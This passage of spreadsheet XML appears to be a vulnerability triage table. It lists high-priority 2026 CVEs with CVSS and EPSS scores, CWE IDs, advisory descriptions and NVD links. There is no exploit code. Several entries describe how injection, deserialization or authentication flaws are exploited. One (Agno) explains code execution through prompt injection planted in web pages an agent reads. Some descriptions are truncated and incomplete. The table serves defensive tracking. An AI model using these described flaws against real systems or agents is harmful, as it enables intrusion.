          <t>fortinet</t>
        </is>
      </c>
      <c r="H130" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortiweb</t>
        </is>
      </c>
      <c r="I130" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L130" s="5" t="inlineStr">
        <is>
          <t>An Improper Authentication vulnerability [CWE-287] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.0 through 7.4.11, FortiWeb 7.2.0 through 7.2.12, FortiWeb 7.0.0 through 7.0.12 may allow a remote unauthenticated attacker to login into the Fortiweb GUI/CLI with a random username and password</t>
        </is>
      </c>
      <c r="M130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26035</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28606</t>
        </is>
      </c>
      <c r="C131" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E131" s="5" t="inlineStr"/>
      <c r="F131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G131" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L131" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28780</t>
        </is>
      </c>
      <c r="C132" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E132" s="5" t="inlineStr"/>
      <c r="F132" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G132" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H132" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I132" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L132" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28780</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31020</t>
        </is>
      </c>
      <c r="C133" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E133" s="5" t="inlineStr"/>
      <c r="F133" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L133" s="5" t="inlineStr">
        <is>
          <t>In DocsGPT 0.15.0 and below, the application provides a custom prompt feature that allows users to define prompt content used during chatbot interactions. This functionality renders user-supplied prompt data using Jinja templates without input sanitization or sandboxing. An unauthenticated attacker can inject malicious template expressions, leading to a server-side template injection (SSTI) vulnerability that can be exploited to achieve full remote code execution (RCE).</t>
        </is>
      </c>
      <c r="M133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31020</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33815</t>
        </is>
      </c>
      <c r="C134" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E134" s="5" t="inlineStr"/>
      <c r="F134" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr">
        <is>
          <t>jackc:pgx</t>
        </is>
      </c>
      <c r="I134" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L134" s="5" t="inlineStr">
        <is>
          <t>Memory-safety vulnerability in github.com/jackc/pgx/v5.</t>
        </is>
      </c>
      <c r="M134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33815</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33816</t>
        </is>
      </c>
      <c r="C135" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E135" s="5" t="inlineStr"/>
      <c r="F135" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr">
        <is>
          <t>jackc:pgx</t>
        </is>
      </c>
      <c r="I135" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L135" s="5" t="inlineStr">
        <is>
          <t>Memory-safety vulnerability in github.com/jackc/pgx/v5.</t>
        </is>
      </c>
      <c r="M135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33816</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35868</t>
        </is>
      </c>
      <c r="C136" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E136" s="5" t="inlineStr"/>
      <c r="F136" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L136" s="5" t="inlineStr">
        <is>
          <t>A Command Injection vulnerability exists in the bs_SetLimitCli_info function within the libshare.so library of LB-link Router AC2100_AZ3 V1.0.4. This flaw occurs due to insufficient validation and sanitization of user-supplied input before it is passed to a system-level command execution context. An attacker can exploit this vulnerability by injecting specially crafted shell metacharacters or payloads into the vulnerable parameter, resulting in the execution of arbitrary operating system commands.</t>
        </is>
      </c>
      <c r="M136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35868</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35869</t>
        </is>
      </c>
      <c r="C137" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E137" s="5" t="inlineStr"/>
      <c r="F137" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L137" s="5" t="inlineStr">
        <is>
          <t>A Command Injection vulnerability exists in the bs_SetLimitCli_info function within the libshare.so library of LB-link Router AC450M V4.0.0. This flaw occurs due to insufficient validation and sanitization of user-supplied input before it is passed to a system-level command execution context. An attacker can exploit this vulnerability by injecting specially crafted shell metacharacters or payloads into the vulnerable parameter, resulting in the execution of arbitrary operating system commands.</t>
        </is>
      </c>
      <c r="M137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35869</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-36433</t>
        </is>
      </c>
      <c r="C138" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E138" s="5" t="inlineStr"/>
      <c r="F138" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L138" s="5" t="inlineStr">
        <is>
          <t>An issue in Actions Semiconductor Co. Ltd Tool- Media Player Utilities v.4.46 allows a physically proximate attacker execute arbitrary code via the Production.dll and RdiskUpgrade.exe components</t>
        </is>
      </c>
      <c r="M138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-36433</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37003</t>
        </is>
      </c>
      <c r="C139" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E139" s="5" t="inlineStr"/>
      <c r="F139" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G139" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L139" s="5" t="inlineStr">
        <is>
          <t>Agno up to and including 2.5.8 is vulnerable to Remote Code Execution (RCE) via prompt injection. The PythonTools and ShellTools components pass unsanitized, LLM-generated arguments directly to execution sinks including exec(), runpy.run_path(), and subprocess.run(). An unauthenticated attacker can exploit this by embedding malicious instructions in content processed by the agent (such as web pages or documents), allowing for arbitrary code and OS command execution on the host server.</t>
        </is>
      </c>
      <c r="M139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37003</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37006</t>
        </is>
      </c>
      <c r="C140" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E140" s="5" t="inlineStr"/>
      <c r="F140" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L140" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the WebSocket endpoint of gpt-researcher v0.14.7 and before allows an unauthenticated remote attacker to achieve code execution via malicious Model Context Protocol configurations.</t>
        </is>
      </c>
      <c r="M140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37006</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37236</t>
        </is>
      </c>
      <c r="C141" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E141" s="5" t="inlineStr"/>
      <c r="F141" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L141" s="5" t="inlineStr">
        <is>
          <t>grpc-gatew</t>
        </is>
      </c>
      <c r="M141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37236</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37751</t>
        </is>
      </c>
      <c r="C142" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E142" s="5" t="inlineStr"/>
      <c r="F142" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the killSessionSync function (lib/agent-runtime.ts) of 23blocks-OS ai-maestro v0.24.17 allows attackers to execute arbitrary commands via a crafted input.</t>
        </is>
      </c>
      <c r="M142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37751</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38165</t>
        </is>
      </c>
      <c r="C143" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D143" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E143" s="5" t="inlineStr"/>
      <c r="F143" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L143" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Template Injection (SSTI) vulnerability in the Velocity template engine configuration of xdocreport v0.9.2 to v2.2.0 allows attackers to execute arbitrary code via a crafted expression.</t>
        </is>
      </c>
      <c r="M143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38165</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39254</t>
        </is>
      </c>
      <c r="C144" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D144" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E144" s="5" t="inlineStr"/>
      <c r="F144" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L144" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in SteelSeries GG (macOS) v.107.0.0 allows a remote attacker to execute arbitrary code via the libSSEdevice.dylib, CxAudioHidDevice::DeviceGetDescriptionString components</t>
        </is>
      </c>
      <c r="M144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39254</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39255</t>
        </is>
      </c>
      <c r="C145" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D145" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E145" s="5" t="inlineStr"/>
      <c r="F145" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L145" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in SteelSeries GG (macOS) v.107.0.0 allows a remote attacker to execute arbitrary code via the libSSEdevice.dylib, dup_wcs components</t>
        </is>
      </c>
      <c r="M145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39255</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40860</t>
        </is>
      </c>
      <c r="C146" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D146" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E146" s="5" t="inlineStr"/>
      <c r="F146" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G146" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H146" s="5" t="inlineStr">
        <is>
          <t>apache:camel</t>
        </is>
      </c>
      <c r="I146" s="5" t="inlineStr">
        <is>
          <t>2026-04-27</t>
        </is>
      </c>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr">
        <is>
          <t>JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6.
This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.
Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.</t>
        </is>
      </c>
      <c r="M146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40860</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41871</t>
        </is>
      </c>
      <c r="C147" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D147" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E147" s="5" t="inlineStr"/>
      <c r="F147" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G147" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H147" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="I147" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862</t>
        </is>
      </c>
      <c r="L147" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')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147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41871</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42027</t>
        </is>
      </c>
      <c r="C148" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D148" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E148" s="5" t="inlineStr"/>
      <c r="F148" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G148" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H148" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="I148" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-502</t>
        </is>
      </c>
      <c r="L148" s="5" t="inlineStr">
        <is>
          <t>Arbitrary Class Instantiation via Model Manifest in Apache OpenNLP ExtensionLoader
Versions Affected: before 1.9.5, before 2.5.9, before 3.0.0-M3
Description: 
The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class. 
Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. 
Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load.
Mitigation: 
  *  2.x users should upgrade to 2.5.9. 
  *  3.x users should upgrade to 3.0.0-M3. 
Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes. 
Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization.</t>
        </is>
      </c>
      <c r="M148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42027</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42581</t>
        </is>
      </c>
      <c r="C149" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D149" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E149" s="5" t="inlineStr"/>
      <c r="F149" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I149" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L149" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42581</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45018</t>
        </is>
      </c>
      <c r="C150" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D150" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E150" s="5" t="inlineStr"/>
      <c r="F150" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G150" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L150" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For stdio transport, the endpoint accepts a user-controlled fullCommand string. The validate_mcp_command() function in backend/chainlit/mcp.py checks only the executable name against config.features.mcp.stdio.allowed_executables and passes unchecked arguments to StdioServerParameters in backend/chainlit/server.py. Because npx supports the -c argument, an attacker can execute arbitrary shell commands with the privileges of the Chainlit process. If allowed_executables is unset, its None default is treated as allowing every executable. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45018</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45117</t>
        </is>
      </c>
      <c r="C151" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D151" s="5" t="inlineStr">
        <is>
